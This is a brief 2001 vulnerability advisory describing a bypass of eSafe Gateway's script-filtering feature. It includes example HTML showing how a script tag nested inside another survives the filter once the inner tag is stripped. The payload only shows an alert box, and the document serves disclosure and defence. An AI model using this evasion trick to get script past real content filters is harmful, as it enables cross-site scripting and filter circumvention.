eSafe Gateway Script-filtering Bypass Vulnerability
by platon on May 23rd, 2001 eSafe Gateway is a security utility used for filtering internet content...
An html file may be crafted to bypass the script-filtering feature offered by eSafe Gateway. This is done by simply changing the syntax of the <SCRIPT>
function in such a way as to trick the filter into generating html that still includes a call to execute the script.
EXPLOIT:
This exploit was provided by eDvice:
Details
----------------------
Let's say for example that we want the following HTML code to enter an
organization and the script it contains to be executed:
<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="JavaScript">
alert("hi");
</SCRIPT>
</BODY></HTML>
If we run this page through eSafe's filtering engine, the script will be
filtered and the resulting with the following HTML code:
<HTML><HEAD></HEAD>
<BODY>
</BODY></HTML>
However, if we create the following code:
<HTML><HEAD></HEAD>
<BODY>
<SCRIPT<script language="javascript"> </script> language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>
Then the inner "<script language="javascript"> </script>" will be extracted
and we will be left with the following HTML code:
<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>
